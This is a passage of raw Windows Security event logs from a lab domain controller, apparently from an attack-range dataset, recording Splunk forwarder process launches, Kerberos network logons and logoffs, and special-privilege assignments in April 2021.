Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd40
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264063
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1528
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264062
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264064
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264065
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7AB2CD
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53333
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:46:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264066
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xea8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264068
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1064
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264067
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x155c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:46:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264069
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x7AB2CD
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:46:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264072
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7AD2BB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:46:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264071
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7AD2BB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51815
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:46:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264070
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7AD2BB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:47:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264073
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcd4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264075
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1240
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264074
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264076
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x87c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264077
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1878
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264079
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264078
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x191c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264085
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B02A1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264084
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B02A1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51822
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264083
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B02A1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264082
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7B0235
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:47:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264081
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7B0235
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
